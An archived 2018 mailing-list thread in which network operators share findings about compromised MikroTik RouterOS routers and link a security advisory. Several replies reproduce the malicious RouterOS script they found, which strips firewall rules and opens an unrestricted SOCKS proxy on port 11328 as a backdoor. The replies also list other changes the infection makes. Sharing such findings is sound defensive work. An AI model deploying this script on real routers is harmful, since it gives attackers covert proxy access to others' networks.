date:20180806

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Scott Reed via Mikrotik-users


Right.

I wanted to make sure people know that there are lots of things that may 
or may not be impacted if a device is infected.  You either have to 
totally delete the configuration and restore from backup or you need to 
go through every menu item and make sure they have not been changed.



On 8/6/2018 6:55, Tim wrote:


This has been detected in devices with earlier versions of ROS.

*From:*mikrotik-users-boun...@wispa.org 
 *On Behalf Of *Scott Reed via 
Mikrotik-users

*Sent:* Monday, August 6, 2018 5:58 AM
*To:* mikrotik-users@wispa.org
*Subject:* Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

It will also change device identity, change admin password, add Admin, 
add 5 firewall filter rules to redirect forward traffic, change DNS 
server, enable DDNS, add IP Web Proxy rules and more, but that is all 
I remember off the top of my head.


On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment
~ "port [0-9]*"];/ip socks set enabled=yes port=11328
max-connections=255 connection-idle-timeout=60;/ip socks access
remove [/ip socks access find];/ip firewall filter add chain=input
protocol=tcp port=11328 action=accept comment="port 11328";/ip
firewall filter move [/ip firewall filter find comment="port
11328"] 1;

-- 


Bob Pensworth, WA7BOB | General Manager

CresComm WiFi, LLC  | (360) 928-, x1

*From:* mikrotik-users-boun...@wispa.org


 *On Behalf Of *Shawn C.
Peppers via Mikrotik-users
*Sent:* Friday, March 16, 2018 11:54 AM
*To:* mikrotik-users@wispa.org ;
memb...@wisp.org 
*Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but


https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com 




___

Mikrotik-users mailing list

Mikrotik-users@wispa.org 

http://lists.wispa.org/mailman/listinfo/mikrotik-users



--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained





Virus-free. www.avg.com 
 





--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained



---
This email has been checked for viruses by AVG.
https://www.avg.com
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Tim via Mikrotik-users

This has been detected in devices with earlier versions of ROS.

From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Scott Reed via Mikrotik-users
Sent: Monday, August 6, 2018 5:58 AM
To: mikrotik-users@wispa.org
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

It will also change device identity, change admin password, add Admin, add 5 
firewall filter rules to redirect forward traffic, change DNS server, enable 
DDNS, add IP Web Proxy rules and more, but that is all I remember off the top 
of my head.

On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

--

Bob Pensworth, WA7BOB | General Manager

  CresComm WiFi, LLC | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org 

  On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org  ; 
memb...@wisp.org 
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com 

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org 
http://lists.wispa.org/mailman/listinfo/mikrotik-users

--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained

Virus-free.  

 www.avg.com 

---
This email has been checked for viruses by Avast antivirus software.
https://www.avast.com/antivirus
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Scott Reed via Mikrotik-users

It will also change device identity, change admin password, add Admin, 
add 5 firewall filter rules to redirect forward traffic, change DNS 
server, enable DDNS, add IP Web Proxy rules and more, but that is all I 
remember off the top of my head.



On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:


We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ 
"port [0-9]*"];/ip socks set enabled=yes port=11328 
max-connections=255 connection-idle-timeout=60;/ip socks access remove 
[/ip socks access find];/ip firewall filter add chain=input 
protocol=tcp port=11328 action=accept comment="port 11328";/ip 
firewall filter move [/ip firewall filter find comment="port 11328"] 1;


--

Bob Pensworth, WA7BOB | General Manager

CresComm WiFi, LLC  | (360) 928-, x1

*From:* mikrotik-users-boun...@wispa.org 
 *On Behalf Of *Shawn C. Peppers via 
Mikrotik-users

*Sent:* Friday, March 16, 2018 11:54 AM
*To:* mikrotik-users@wispa.org; memb...@wisp.org
*Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com 



___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users


--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained



---
This email has been checked for viruses by AVG.
https://www.avg.com
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

3 matches

Site Navigation

Mail list logo

Footer information